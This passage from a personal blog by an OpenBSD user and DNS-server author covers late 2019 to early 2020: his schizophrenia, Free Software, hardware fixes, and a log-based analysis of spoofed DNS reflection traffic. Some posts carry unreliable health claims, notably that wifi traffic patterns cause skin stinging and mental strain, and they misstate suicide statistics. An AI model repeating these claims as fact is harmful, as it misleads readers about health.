prisoners. I don't know if this is good at all. We're moving towards a
society that wants to "fix" delinquents. This is harmful to the human race.
Those that have been identified with a criminal-gene should be allowed to
live out their their lives without medications, even though their chances
of causing a criminal offense may be higher. Fix society not
those within it! The system is not perfect! So the wardens and protecters
of this system can't do this.
It's all about control, if you saw my most recent "Living with Schitzophrenia"
article. This control I dislike. I do take my pills becuase they want me
to. I'm a model schizophrenic. But wait. Am I a schizophrenic at all?
I don't hear voices, like intelligent Schizophrenics do, I only had visual
hallucinations and delusions that vampires exist. All the better for the
vampire. Germany's system has programmed us to be afraid of vampires from
an early age. The "The little vampire" books, film series and movies were
very damaging for my generation. Even I was indoctrinated by this bullshit.
This I think led to my psychosis in 2002.
As an aside did you know that the actor who played
Auric Goldfinger from the 007 film "Goldfinger" played an inspector in the
film series "The little Vampire"? Goldfinger was the one who said
"No, I expect you to die Mr. Bond" as a laser threatens to cut James Bond
apart. This has a link to my psychosis, because there is a link to my
psychosis with the "Goldflipper" release of OpenBSD. Because they told my
story so well at the right time, in a parallel universe sort of telling.
Whatever I experienced must have been orchestrated by a systemic cast, I'm
sure, unless that's a delusion. In September 2002 I was convinced I was a
spy also. Although I have no knowledge of being recruited. Perhaps it's
some MK Ultra CIA stuff.
Anyhow. Psychiatric institutions should not be overcrowded with people who
are criminals just because they have been committing a criminal act. These
were built for truely dangerous psychotics who cannot be put in with the
regular psychotic population. Truely dangerous means someone who has
violent outbursts who endangers human lives, and repeatedly, someone who
doesn't calm down and is a sheer wreck. As a teen
I've met a person who a friend of mine bought weed from who was this type
of person. We saw him be all friendly eating at Red Lobster, next thing he's
yelling and raving. He believed in the park where he tried to sell us tea were
microphones in the trees and we should be quieter (this was in 1993, so
well before this surveillance madness that we're living through today).
That was my first time dealing with someone pretty psychotic. We ended
up running to my car and getting the hell out of there. To this guys
benefit I think he tricked us into driving him to this park in north-eastern
Toronto from downtown evading having to take subway and bus. We were just a
means of getting this guy home safely and comfortably. Kinda smart in a
psychotic kind of way.
Anyhow, part of the healing of psychotic people is giving us time and space
from others. So that we really find ourselves, before being influenced by
another person. Mixing us with people who talk about the next heist they're
gonna do, or bragging what their criminal history is, is not beneficial. It
leads to bad ideas. The system can't want this!
I'm back IRC'ing
September 28th, 2019
I've been back at IRC for a few days now. I finally gave in to my cravings
of using this communication tool. I think I'm still addicted to chat. But
if I didn't have this chat I would be talking to myself, which I'd rather
not. On to some great IRC'ing days!
I have purchased two books from Lehmann's
September 28th, 2019
One dealing with routing protocols and another with machine learning for email.
I hope this will be the last of books for the year, I'M approaching 12 books
bought, which is near the average for the past few years. If you're interested
in seeing the books I purchased see here.
Understanding Psychosis presentation
September 28th, 2019
I just watched Tara Niendem PhD in a talk at University of California at Davis
regarding her talk about "Understanding Psychosis" on Youtube and I thought
it was well said. Now I'm trying to remember parts of it and she said that
Psychosis
affects 2% of the population, which is higher than the 1% that I've been
learning about, maybe there is a rise? She talked about the 2 G's which
are Ghosts and Genes. She used Ghosts as an example and I found myself
shuddering at her examples of seeing ghosts. She explained someone who is
psychotic will see these on a frequent basis, not just once which is common
to happen to many. Genes, she said is that we carry 10% likelyhood of genes
having something to do with a psychosis. Interesting. I did kind of disagree
that psychosis is a solely a brain disorder because we do have a 2nd brain
in our tummies. It may not have the functionality of a full brain but offloads
it. But she's the doctor, I'm the patient.
So hats off to Tara for a great talk. I don't think she'll ever hear of me
because I have google blocked from reading this blog but who knows. We're
seperated by 6 degrees of seperation anyhow (and some say less). One more
thing I want to say about the Drug use in patients who suffer psychosis where
she said "don't do drugs" she's completely right. I've been drug free for 19
years now, where I had 1 joint or something in 2000, or thereabouts. The long
break from marijuana use has done me well I think. I hadn't had many relapses
in 17 years where I had acute symptoms of psychosis 17 years ago.
Oh yeah I was saddened a great deal by the figure that 50% of people with
psychosis attempt suicide and 10% succeed. That means out of 100 people
50 attempt suicide and 5 succeed. That's very troubling. I think I'm past
this point, I can live with Schitzophrenia well, given reduced stress
environments but I mourn every life lost to this illness. Thanks Dr. Niendem.
The answer to Life, the Universe and everything
September 28th, 2019
Well D.N.A. (Not the double-helix, although that comes into play perhaps, but
Douglas N. Adams) was right. In his story the hitchhikers guide to the galaxy
he writes about earth being a supercomputer built by mice designed to answer
the most question of questions, the answer to life, the universe and everything.
Well I have had this question run through my head for a matter of decades now
and I think I came to a conclusion. The supercomputer (earth) is the 3rd
planet from our star, the sun. Mars then is the 4th planet and Venus the 2nd
planet. You might guess by now but the answer that the supercomputer gave
back were the position of orbits to the answer of life, the universe and
everything. 4,2.. mars, venus. Then to elaborate...I think what the super
computer wanted to say was:
Men are from Mars, Women are from Venus.
In other news... I saw a reporting from the "what da math" on youtube today
reporting that scientists think that Venus had liquid water around 250 million
years ago, but something went awry. Temperatures were modelled to be between
20 and 50 degrees celsius there. Well I'm going back to bed. Good night.
What does Free Software mean to me?
September 30th, 2019
In the autumn and winter of 1995 I first installed Linux on my 486 computer.
I was living in College Residence at Humber College at the time and I had
closed myself off from friends because I, "wanted to learn UN*X" it was a
career striving. I didn't stay long at Humber College and was out of the
residence by Christmas 1995. After crashing at a friends for 6 weeks I got
a job and a 1-bedroom apartment at Bloor and Jane in Toronto. Here I
persued my MUD playing habits and I was pretty much out of it. Linux was
then not good enough anymore and I installed FreeBSD, it was spring 1996.
My brother who sometimes visited me liked playing Doom on Linux and I had
to disappoint him when I had FreeBSD installed, it wasn't the same on X11.
Anyhow that's the history of me and using Open Source Operating Systems
in the mid 1990's.
I was actively learning C then because at Humber first
semester we learned only Pascal. I had a K&R The (ansi) C Programming
Language book and it was a fairly hard read. I did this as alone so there
was no exchange of ideas and support. In turn I didn't learn to read C
much. But I learned to use a debugger and somehow compiling things worked.
I systematically learned systemcalls out of section 2 of the BSD manual over
the years and I explored the system with great interest. Important for me
to know was how the password system worked, how to do socket programming
including raw sockets which allowed spoofing. OK so I had a bit of a hacker
in me, but I never used these skills for hacking. So as the story goes it
is now 24 years later, what can I conclude?
I can conclude that having compilable open source is great to have, EVEN IF
I will never read that code. There comes situations where you're forced to
take a look anyhow, and that is when the access to the source code pays off.
99% of the time I don't read code. And in that 1% of the time 99% is spend
trying to make sense of it all. So 0.01% of the time is spent doing any
actual change. It would disturb me pretty much if for example OpenBSD said
they will keep the source code secret and only distribute binaries. It would
be the end of OpenBSD for me. Even though I don't use the source, I will want
it around.
I have several projects written in C that I share. In fact only one is
maintained by me (delphinusdnsd) and it sorta works where the others may not
work at all. But it would inconvenience me a great deal if I had to read
back all of that source code in order to find a backdoor that a hacker may
have put in. I wrote that code so I trust it. But I don't remember every
little detail of it, the daemon was written since 2005. In order to add
things to it I have to backread things too, but it usually is faster than
reading someone else's code as I have my own style.
So I have touched on
the Open Source side of Free Software but not the Free (as in beer) side.
I think software should be shared and free. This makes hardware manufacturers
the only employers for software, since everyone else relies on free software.
Obviously in todays world it doesn't work like that. Microsoft despite free
software is doing better than ever. Why that is is beyond me. Some people
still believe in Microsoft I guess and never went away. This is probably
the only reason free software hasn't killed proprietary software. I personally
think that even hardware designs should be free, but we're a long way from
that. In fact in my imaginary world of perfection people would build their
own smart phones or digital assistants if they must. Right down to the last
logic gate. It's a dream and so far from the present model that it will never
be attainable.
Today, many kids probably think the smart phone they're holding
is associated with magic. Even when told that it is a machine. Try it out
on your kid. I don't have kids, in that I can try this on them, but I think
I'm right here. The computer is magic, and it shouldn't be. If it were
not magic, on the other end of my view it is hard gruelling work to get
anything done right. In that regard programmers and hardware designers are
under-appreciated.
I would do a few things differently if I had a chance to go back to 1995. What
exactly would be different I don't know yet. I'm proud of the learning curve
I had. But I'm not proud of not being able to put up my own fixes to problems
I find with the OS. There often isn't time to get the fix done in a timely
manner, or I'm lazy at those moments. But I remember when I found a panic
condition in the radix tree of the routing lookups in OpenBSD. I found it
with a program that I had programmed in Y2K/2001 and had I not that
preparatory work with all it's demises this bug would have been found at a
much later date if ever.
Closing paragraph: I think Free Software is needed to shape the world into
something that is better than what it is today.
Red Maple II - a few days later
September 30th, 2019
We have a very windy day so these leafs aren't gonna stay very long, thought
I'd give another photo to you from it. It's more red now.
If it were my tree I'd probably try sapping syrup from it, dunno if it would
hurt the tree though, it's still pretty young.
The (unexplored) side-effects of Wifi
October 1st, 2019
Wifi is great. You don't even know it's there and it gives you instant
Internet. Here is a story
of someone who'll differ. She self-diagnosed radiation sensitivity.
Today
I'm a little more careful with my wifi. I have cabled almost every room in
my apartment so I don't need wifi. My wifi access point is off and I can
turn it on when I need it. For example when I want to upload photos from my
ipod to my Mail account. But out of experience I remember two things. Once
when I had Freifunk, someone would download large amounts of data and I'd
feel a sort of soft stinging in my legs skin. I later correlated that this
was related after I looked out and saw that someone was on the freifunk with
a laptop.
Another observation I had was that during times of intense
email discussion at the freifunk organization the pattern of data going through
my freifunk router was different. I usually felt pretty drained and hot
headed after these moments. But, could it be that modulation, or controlling
the packet flow of wifi signals had an impact on my brain? The freifunk
system was a layer 2 bridging system and anyone in the region would have
felt it, and anyone in the region could have sent broadcast packets to cause
traffic on my local wifi link. This is brief sum-up of what the technology
is and how it could have been used. Someone could have been monitoring email
and just as discussion heated up start sending broadcast signals in a certain
pattern. Everyone in that region would have been irradiated. It's not a
lot of effort.
I don't want to dirty talk freifunk, it's a great concept. I wish it will
be able to be extended using cables instead of just wireless. But in terms
of my health I'm being a bit more careful with wifi signals. I still have
to turn my parents signal off at off-times at the router. That is possible.
Something like between midnight and 5AM no wifi. That gives a relatively
small window of no signal, but it would be beneficial as sleep can get it's
own REM pattern without radiation influence. Might make a diff.
Other than cabling there is alternatives. Lifi is trying to break into the
household but it's having a hard time getting through. Not sure why. Lifi
uses visible light, and can't be misused/abused by hackers when the curtains
are shut. And I'll put another vapour ware forward for wireless perhaps in
the future there will be quantum entangling something. Then you can be any-
where on earth and just communicate with the spinning state of an entangled
atom or particle. That's likely safer than radio. But who knows? It's
probably not as fast bandwidth wise as wifi though.
You agree to getting a cookie by clicking here
October 2nd, 2019
Yesterday on the ARD Tagesschau german news I saw some law being passed about
cookie warnings. So I have warnings now. You don't get a cookie automatically
by clicking on an article but are warned if you write a comment a cookie
is made for the captcha. Thanks!
This year the heat will be turned up later than last year
October 2nd, 2019
I'm already happy about this. I'll use less electricity for this year.
Last year
I turned on the heat on October 3rd. It looks like now that the weather
is warmer this year than that. And perhaps there is hope for a "golden
october" next week? Unfortunately the price of electricity keeps getting
raised due to taxes (such as CO2). Eventually the savings I'm making with
the city works as my electric company will even out and I'll be able to
pay similar as one of those green electricity suppliers. Looking forward
to it, but it'll probably cost a lot more. I'm fearing my electricity
bill will go up 50% to roughly 3000 EUR per year. We'll see what the
future holds.
Changed mail.centroid.eu certs to letsencrypt
October 3rd, 2019
I have done this change allowing my mom's ipad to work again. I recently
upgraded that ipad to version iPadOS 13.1.2 and mail stopped working for
her. I have also updated the DANE TLSA RR's in DNS for all mail. I'm
reusing the same certificate for POP3 and SMTP mail. I hope that's not
a bad thing to do.
Turned on the heat for 2019/2020 winter season
October 7th, 2019
It's four (4) days later than last year. I got lucky, but now it's getting
a bit too cool in the apartment. I set the electric heaters to step 1 out of
a possible 3. It will take about 2 days for them to reach normal operating
temperature since they are of the "nachtspeicherofen" kind.
Ordered a PCI USB 2.0 adapter
October 7th, 2019
I need this because my G5 lacks enough USB 2.0 ports. I noticed the KVM
switch does not like the USB 1.0 ports that are there for keyboard and mouse
and so I'm trying with this expansion card that has 4 external ports.
It should be delivered here thursday at the latest. Hopefully it will make
a diff!
I am now a MacOS-free household
October 09th, 2019
After I put OpenBSD on my 2015 MBP, I realised I created a void. I finally
realised what it was. I don't own any more MacOS computers. In a few years
perhaps I'll get my hands on one again perhaps. But for now there is a
transitional phase where I don't have to worry about the security of MacOS.
This is a giant plus. I do have my ipod still running a very hackable iOS 9.
So I don't use it much anymore except for google authenticator. But I must
look for an alternative for that. My eyes are set on a Purism Librem 5 but
only if it carries the CE cert, which should be mid 2020. I'll be watching
that scene quite intensely because it would be my first cell/smart phone.
Three more USB 2.0 ports on my G5 Mac
October 11th, 2019
Well, I finally got the 2nd PCI card for USB 2.0. I got it from reichelt.de,
and it's an exsys.de product. It works in the Mac at least it's not smoking
like the previous card. Unfortunately my idea that the USB 1.0 ports on
the Mac were responsible for the KVM switch not working was not right. Even
with this new card there is a problem booting with 'boot -a' on OpenBSD.
My second guess is that when the driver attaches to the USB keyboard, the
switch resets it and there is no new handshakes and OpenBSD/macppc sits in a
prompt asking which drive to use. Since the keyboard reset, I can't enter
anything. Oh well. It is becoming more evident that I need to use this G5
as a standalone device. Perhaps what OpenBSD can do is get rid of the -a
flag in ofwboot and really detect which device (ultra0, or ultra1) was the
device that was booted with from OFW. It doesn't do this and the -a flag
is the workaround. Another workaround could be to allow USB to reconfigure
in the -a prompt. Then I think it could work.
SpaceX Starlink, appease the concerned Astronomers
October 17th, 2019
SpaceX has applied 30,000 (30K) more satellites to be put in orbit. But this
is getting a bit too much in my eyes. I would appease the Union of concerned
Astronomers first. Perhaps with launches of astronomy equipment to the far
side of the moon. We are at a crossroads here and astronomy on earth will
never be the same with so many satellites in low earth orbit. Here is a
story from slashdot.
Compromises will have to be made if we let SpaceX do this.
OpenBSD 6.6 released yesterday
October 18th, 2019
I have already upgraded most of my OpenBSD computers. There is very little
others to do. For my workstation beta I think I'm going to attempt a source
code update and then install the 6.6 kernel afterwards. The 6.6
release page is here. The
artwork seems to lean on the movie "Trolls 2", for which I saw a trailer
yesterday. Thank you OpenBSD, for everything!
My Halloween Witches Brexit Poem
October 19th, 2019
I just formulated this on IRC:
brexit brexit what's the deal,
independence we must feel!,
But if it does break our backs,
we go back to live in shacks!
fire, smoke and turmoil,
the soup is about to boil,
and if it causes hardships,
you will hear it from my lips
Not quite a Harry Potter rhyme but I tried.
Caught in Holger's trap, patch produced
October 24th, 2019
I upgraded my octeon NAT router even though I knew someone was getting a
panic condition. That was monday. What ensued was a 2 day mad hacking
event to produce a patch. It was a guy named Holger that first
reported the
trap 2 upon a pppoe connect. This affects only octeon architecture in OpenBSD.
My patch works but is probably not the fix that OpenBSD is looking for. Miod
produced a patch but it didn't fix the trap condition. So this is what
kept me on my toes in the last little while. It's awesome I have a patch
to fall back on, and I made it!
Three days til Brexit, Goodbye UK! - EU
October 28th, 2019
When I returned to the EU from Canada, in 2002, I felt it was nice to have
the UK in the European Union. I had actually started thinking of taking
a trip to London per rail through the channel tunnel, but then Brexit came
and I didn't feel such a need anymore. Too bad. The UK will be more like
Canada in that it's a country next to a great Union (UK next to EU, and
Canada next to USA), I wondered if this is the English way, when I made that
comparison. One can also include Australia next to China but there is a bit
of ocean between them. So well...I hope Britain does well and I hope they'll
be able to open doors-of-thinking to the EU in terms of a different point of
view. At first the UK rejoining the EU is probably not wise, I don't know
if there would be retaliations from the EU if that were to happen. Let's
be seperated for a bit, what comes next I hope will be positive. Goodbye
UK - European Union Citizen.
Happy Hallowe'en
October 31th, 2019
I got treats this year, but only limited. I'm basing this on last years so
hopefully it'll be like last year. HOohooo! I'm not dressing up though.
Coding a lot in the last little while
November 6th, 2019
If you haven't seen already I'm quite busy writing at the
delphinusdns.org blog. It looks
I'm on track for the delphinusdnsd release at new years 2020.
Turned off my Edgerouter 8 (octeon)
November 8th, 2019
The last little while I noticed a high pitched noise when I was sleeping.
At first I thought it was a tinnitus but when I changed ends of the bed to
sleep it wasn't as apparent. So yesterday I moved all functionality from
my ER-8 router to a Unifi security gateway (also octeon). After a good
nights sleep I am glad to report that it was the ER-8 and its fans. It is
really a router that belongs into a data center or switch closet. However
the door was always shut between the router and my bedroom but it was the
vibration harmonics of the walls that likely caused this high pitched sound.
I now have an ER-8 that I have to disassemble from the hallway cabinet, I also
have only 1 router left (uranus see my computers in /private) as a cold-standby
replacement router. It seems I may not have to retire all these computers
come 2020, as I need them. As for the ER-8 I think I'm keeping it for a time
when I may do colocation somewhere (whenever) but it's rather slow and would
be only useful for 100 mbit networks.
Have a bad cold
November 12th, 2019
Yesterday I might have thought I may have the flu, but it's not that. I just
have a bad cold. So...gute besserung to myself. I'm taking it easy.
Upgraded this Server
November 13th, 2019
I have upgraded this server to OpenBSD version 6.6. It was mostly uneventful
afaik. Only very little things left to do to complete the upgrade.
The GoldFlipper Project has ended
November 14th, 2019
The domain goldflipper.de expires in april 2020. This gives half a year
of this tiled collage on a 4x4 grid that I did. Check it out
here. In three tiles there is the
almost original goldflipper from OpenBSD. But I actually drew it off with
my wacom tablet. It's not an original image it's drawn off. However I feel
I have done enough with goldflipper for the past few years. I'm very proud
of this collage and the individual (mostly 900x900 canvas) drawings. Anyhow
enjoy.
strlnk is skynet!
November 16th, 2019
SpaceX
s t [A] r l [I] n k
Y
i s
S:K:Y:N:E:T
genesys
Someone is spoofing and it isn't me!
November 18th, 2019
I'm a good boy when it comes to forging source IP addresses. I have been
getting these in my logs:
Nov 18 12:16:59 kite delphinusdnsd[90398]: request on descriptor 12 interface \
"5.9.87.75" from 45.144.2.100 (ttl=249, region=1) for "directedat.usa." \
type=ANY(255) class=1, edns0, answering "REFUSED" (43/32)
Nov 18 12:16:59 kite delphinusdnsd[90398]: UDP connection refused on \
descriptor 12 interface "5.9.87.75" from 45.144.2.100 (ttl=249, region=1) \
ratelimit policy dropping packet
For one it's an illegal DNS packet. But how do I know it's spoofed? The IP
TTL is 249, meaning at the farthest point from me the spoofer started at 255
TTL or (255 - 249 = 6 hops), 6 hops away. He's not coming from the USA, or
that IP because when I ping it, it reveals a TTL of 8 hops (64 - 56 = 8 hops).
kite$ ping -c 2 45.144.2.100
PING 45.144.2.100 (45.144.2.100): 56 data bytes
64 bytes from 45.144.2.100: icmp_seq=0 ttl=56 time=45.155 ms
64 bytes from 45.144.2.100: icmp_seq=1 ttl=56 time=42.906 ms
--- 45.144.2.100 ping statistics ---
2 packets transmitted, 2 packets received, 0.0% packet loss
round-trip min/avg/max/std-dev = 42.906/44.031/45.155/1.125 ms
kite$ dc
255 249 - p
6
64 56 - p
8
On top of that my regions indicate the source region is 1 which is ARIN. But
6 hops out is a little bit too close, I don't believe the USA starts within
6 hops from kite, it takes 4 hops alone to get to the border of this network
in frankfurt. So to the script kiddie who is using me as a reflection attack,
HOW YA FEEL! (smile, it's your 15 min of fame).
Upgraded kite.centroid.eu to OpenBSD 6.6
November 22nd, 2019
I did this yesterday. The upgrade went smooth, no complaints.
One week left to get Christmas shopping done
November 22nd, 2019
I do my christmas shopping in November. This is to take the stress off
DHL and other couriers like Hermes. It takes a bit of the christmas spirit
away but that's another cynical gripe another day.
OpenSMTPD has filters
November 23rd, 2019
Since a few days when I upgraded my mail server I've been trying out different
methods of spam control. I think it's a total success what I have so far.
Over night it caught 14 spams. That's amazing. I'll continue to play with
these settings perhaps I can cut spam 80-90%.
Christmas is exactly 1 month away
November 25th, 2019
Other important dates include the december solstice on the 22nd of december.
The major thing keeping me busy currently is putting the final codes in for
delphinusdnsd 1.4, which is expected to be released on or before december 31st.
Next week is the 1st of advent. Have a Merry Season!
Slashdot turned Anonymous Coward postings off
November 28th, 2019
And there is a story that I commented on.. it was in regard to a Go player
quitting becuase "AI cannot be defeated"
Well here is my Reply:
A human brain is about 20cm by 20cm by 15cm give or take 5 cm on each end.
It is said to consume around 35 Watts. Can a computer beat that? We know
a computer can beat a human mind at gaming...but how large is this computer
is it a super computer, a quantum computer or a single little SoC computer?
This is what's important nothing else matters. And.. we dream!
Dreaming.. because we cannot explain it, oughta rock the sockets off a computer.
Three Months left for SolarScale.DE
November 30th, 2019
I'm letting this domain expire. I've had it for around 10 years. Just gotta
update my contact addresses on my registrar as I believe this domain name
always finds it back as the owner address. I'll contact my registration
agent soon.
I'm fourty-four and fat, setting up computers is for 20 somethings
December 05th, 2019
Just turned down a job because I refuse to set up computers for a job.
Crawling under desks is for 20-somethings who are physically able to do so.
I've gone through too many pairs of jeans that I've ruined doing that in
the past that I know this isn't a job for me. Next.
Christmas in two Weeks, Solstice in eleven days
December 11th, 2019
I'm looking forward to this, I got all presents already.
First day of snow for 2019/2020 Season
December 11th, 2019
I just looked outside and it's lightly snowing.
Identifying my conflict by names
December 16th, 2019
When I was working I had a conflict of interest. Always. The conflict was
IRC chat, Open Source programming and Knowledge Seeking. In 1997 I would
literally lead the life of a junky. Computers were my drug. I'd work my
afternoon-night shift and then go home to IRC about two hours. In the morning
I'd maybe program for two hours before going to work. Back then the programs
were tiny, it was more knowledge seeking than programming.
In 2017 I would
literally lead the life of a junky. Computers were my drug. I'd work the
afternoon-night shift and then go to bed. In the mornings I'd program on my
open source program.
I've always felt a pressure sorta like a split personality when doing work and
when persueing my hobbies. Obviously there was little time for exercise and
that's why I'm 400 lbs now (the meds helped too). I'm offering this
information for free for anyone
because perhaps someone has a solution how to manage these things on a timely
manner, so that I lead less the life of a junky but rather the life of a human
being. Every problem has a solution.
I have created my first X11 application in 18 years
December 17th, 2019
I did this in GTK+. It was painful but here is a screenshot for the sha256
calculator (same output as sha256 -b). You can also specify a number of
rounds which will feed the output back into the SHA256 function. Here is a
screenshot.
I'm stoked right now.
Some politicians want longer nuclear life
December 18th, 2019
Angela Merkel already said that we're abandoning the nuclear power plants.
Are you gonna make her a hypocrite? She'll go down in history as a farce.
My former job got aquired again
December 18th, 2019
Up until August 2015 I worked for EnhancedVOIP Inc. aka EasyOfficephone.COM.
It was a nice job and it gave me a job for 8 years if you count the years
past 2015 until 2018 that I worked for Jive Canada the company that emerged
when Jive aquired easyofficephone.com. Then 1 week after I handed in my
resignation (it was really bad bad timing on my part) Jive was aquired by
LogMeIn a company out of Boston. This was March 2018. I guess it didn't
take long because LMI was aquired by a
Private-Equity firm. So had I stayed with Jive Canada,
this would have been the 3rd aquisition in 4.5 years, or roughly an aquisition
every 1.5 years. I read a little on y.combinator.org (HN), that the
4.3 billion dollars are going to be tried to be recovered. Someone used the
example of "You are an orange, someone aquired you and is trying to sell you
as Orangejuice". There is likely a lot of pressure on individual employees
there. I'm not sure if I got out OK. I know I can kiss all the savings I
made at Jive and easyofficephone.com goodbye (because I lived on it for 1.5
years while looking for a new job), and the job I went to didn't
work out unfortunately. I caught a strain of bad luck in 2018, and now I'm
working to make amends with what I got and with help from the german (un-)
employement office. I'll be keeping tabs though to see what happens to LMI,
I know they dissassembled the network I was system administrating sometime
early this year. It lasted about a year after I left. The remnant of that
network are still found on the internet for example if you did a dig...
But other than that the network is dead as a doorknob. I guess Jive Canada
was integrated into Jive USA technology wise. Which is really a good thing
because we had software from 2010 and before running on it. It was patched
all along on the servers (that was my job) but the core functions weren't
changed.
Solstice in three days
December 19th, 2019
The december solstice is upon us again in three days. After that (low) point
the days will start getting longer again, probably noticable in february or
march. Have a good longest dark time of the year.
NXDOMAIN and NOERROR answers with DNSSEC could be wrong (SERVFAIL)
December 23th, 2019
I have unearthed a trove of bugs. I'm hoping to fix these on the 26th of
december giving us one day for release. If more gets found after I'll roll
a 1.4.1 release after 1.4.0, I really want to finish the release in 2019 still.
If this affects you, I'm sorry. But at least these bugs are being found now.
Just bad timing around christmas.
Merry Christmas
December 24th, 2019
Have a good time.
My G5 on the shelf I got for Christmas
December 26th, 2019
Here you can see my G5 with 2 windows PC's (NUC and core i3 workstation).
The G5 runs OpenBSD/macppc and an old Mac OS X (haven't gotten around to
destroying it yet). Notice the quad ethernet cable that the G5 isn't able
to make much use of, due to processor speed, really 1 cable is all it can
use to max out. It was a silly purchase but I wanted it. All these stand
on a shelf that my dad got me for christmas. It's the best present other
than the UPS that I got. Very useful!
Will Humans come to the table?
December 27th, 2019
Climate change is real. We need to cut CO2. I recently viewed a chart that
showed energy production from 1999 until 2019, so the last 20 years. If we
cut nuclear and all coal, we're down to a 2005 level. That's not bad at all!
But! Will humans come to the table about their cars? We could do this all
tomorrow I bet.
Apple no longer supports RSS
December 28th, 2019
This article describes how apple no longer supports RSS. I found it off
Hacker News (aka Y.Combinator). It's a pity. While I still have some apple
gear, I'm thinking of getting rid of the apple eco-system. In fact the only
device I still own is an old ipod. And it's hackable and untrustworthy other
than for the google authenticator app and the mp3 player which I still use.
I feel technology is drifting away from what it could be, and I'm left behind.
But don't worry I have a plan. I may start an NNTP server here and tie it
together with DNS somehow. Will have to see. I also wanted to do something
with SIP, perhaps a BBS of sorts that's accessable from the PSTN and the
Internet. Another Idea I had was a darknet gateway (my own dark-bubble).
Perhaps it can all be put together / tied together. I have the servers after
all.
Was 2019 hard enough?
December 28th, 2019
In 2019 I had it pretty easy. Well sorta. I didn't get jobs I applied at, so
I was unemployed the entire year. I kept working away at my DNS server though.
And the 1.4.0 release will be something better than 2018's 1.3.0 release.
I also hooked up a "work-rehabilitation" gig with the local Arbeitsamt. Not
sure what to expect but in parallel I'm going on welfare in 2020. Until I can
pay my own way again. So that's the epi and the pro (metheus) of 2019/2020.
I have a million words to say only it would come out all disorganised so I'll
keep it short. Looking forward to 2020.
Some review of last decade
December 31st, 2019
I'm gonna list some things that stood out for me in the 2010's:
Eight years of employment (Red Cross, easyofficephone.com/jive.com),
this latter unfortunately brought about by the death of friend shifted me
into employment for most of
the decade whereas I had almost as much unemployment in the 2000 decade.
New apartment, starting from 2013 until now I live in an apartment that is
about my size, perhaps a little smaller could work too, but I'm not complaining
I went through two workstations, one was a core i7-930 or something and the
other which is my current workstation a Xeon e3 with 32 GB RAM. I unfortunately
invested heavily in Intel. Another big event was getting the Apple Mac Mini
and the Apple MacBook Pro (that I'm currently writing on).
I bought a used computer from the previous decade, a G5 PowerMac with
intention of porting OpenBSD to 64-bit on it, failed
It's hard to say how much weight I really gained, but I'm guestimateing I
became 70 lbs heavier at minimum
The 2010's were without a hospital visit because of my mental illness. I
remained an out-patient. The meds I took throughout this decade were
abilify/aripiprazol
I did not have a girlfriend in the 2010's pretty much the same as the 2000's.
I had a change of psychiatrist for the last two years or so
This blog was rewritten in C with libkcgi, the blog itself being started in
2009
In the 15 years of delphinusdnsd/wildcarddnsd I invested into this heavily iwith time
I was able to get a lot of books after 2013 with about 12-15 per year on
average
All in all it was a good decade. I hope I will be able to get employment
again in 2020's and pretty much repeat what happened last decade.
New Years resolutions
December 31st, 2019
I plan on becomeing more active, starting with walking at least 1000 meters a
day in 2020. Everything is second to this.
Happy New Year 2020
January 1st, 2020
Hope you had a good night!
My Canadian stay, graphed
January 2nd, 2020
I was born in 1976 in Germany. In 1987 my life changed, I became the son of
a migrant. In 1995 then I broke the barrier of having lived more on canadian
soil than on german. This peaked until 2002 when I returned to Germany. This
graph reflects the years I lived in Canada and they'll always be part of my
life.
When I'm 48 I'll have lived 2/3's of my life in Germany. I think this graph
is a nice reflection of what a migrants life is like, because time can't be
undone and our memories keep reminding us of our past. My behaviour shows
a foreigness, I am a migrants son. This graph shows it.
Whiners
January 9th, 2020
In OpenBSD's mailing list, there is a lot of people vocal about what OpenBSD
doesn't have and they like to express themselves on the misc mailing list.
It's getting so annoying to me that I'm venting on my own blog because I
don't want to add to the pollutants on that list by replying to threads.
Let's take a look at OpenBSD, and why it doesn't have some features. I'm
only guessing, as I'm on the sidelines:
OpenBSD likes to do things themselves (not invented here syndrome)
OpenBSD has a lack of developers
OpenBSD has a lack of time to satisfy everyones wishes
Others code is often treated very carefully as it hasn't been sanitized
OpenBSD has their own established way to find bugs and to evaluate code
Anyone who doesn't realize this has probably joined the wrong project
('s mailing list). There is a few things you can do to cope with what appears
as a lacking in the project (but isn't and you'll find out why).
Ask not what your operating system project can do for you, ask what you can
do for your operating system project.
The times of getting showered with gifts are over, you'll need to unlearn
your undeserved criticism, in order to appreciate fully.
Brainstorm how you can contribute to make it easier on the OpenBSD project. If they don't want your code, maybe they want your money? Obviously with no
strings attached.
Learn to stay quiet (It's very hard), as you'll be remembered either as a
source of signal or noise, wishful signals later get judged as noise.
Programming (with keyboard, sitting in a chair) is one of the stupidest
deeds one can do. This is why payment to programmers is often high, to
re-imburse them for their pain or future pain. They do it for fun and because
it delights them, that others have fun with it, but it is in the end gruelling
work. The people at OpenBSD probably know all too well what I mean here.
An operating system's development work is never done. It is a sisyphus work.
As an aside and this is generally for programmers:
Programming is mental work. How many programmers do you know? How many of
those are social outcasts, or have mental breakdowns? What about their body?
Is it breaking down due to the will that some code functions but they neglected
their body? Do you realise it yet? OpenBSD programmers are brave for
attempting the seemingly impossible. But will they change for the worst or
for the better? Is criticism torment or constructive? That shiny
functionality you want (maybe a filesystem?) means a lot of work for other
people, and their goals fall further back in time. Life as a human (programmer) is often not fair. We've been spoiled with automation (but that's another
story/article).
CVS repo maintenance
January 10th, 2020
I have deleted the following programs from my CVS repo. They are old,
unmaintained and use SHA-1 (for some).
I have deleted the following links from this blog. They were either old,
unmaintained, didn't fit to this blog anymore, or are not endorsed anymore.
goldflipper.de
solarscale.de
Bruce Schneier's Blog
ISN Oldenburg
My C primer at hackepedia
Hackepedia
Higher latitudes blog
You may find these again in the archive.org links perhaps. Solarscale.de is
expiring in 22 days.
Differences, but some things stay the same
January 10th, 2020
In 2012 (so 8 years ago), I took this photo:
and just now I took this photo of my office:
The first photo has a lot more dirt, as it was in my dusty old apartment, which
was almost as big as the (home) office is, btw. The thing that remained was
the IKEA kitchen counter which I use as a table. In fact a lot of my stuff
came from IKEA. We'll see if I can keep this apartment another 8 years. :-)
Wa(co)m Gogh
January 10th, 2020
I doodled a bit with my wacom tablet and then bucket filled a van gogh in there
it turned out pretty I want to share:
I don't know if it's a real van gogh or a fake but I got it with google's help
from this URL.
IOTA dmesg
January 13th, 2020
I noticed I didn't have this dmesg in my blog, so I'm gonna post it. The blog
is where I usually backread dmesg's of my hardware, without having to boot the
hardware.
OpenBSD 6.6 (GENERIC.MP) #603: Fri Oct 4 13:45:51 MDT 2019
deraadt@macppc.openbsd.org:/usr/src/sys/arch/macppc/compile/GENERIC.MP
real mem = 0 (0MB)
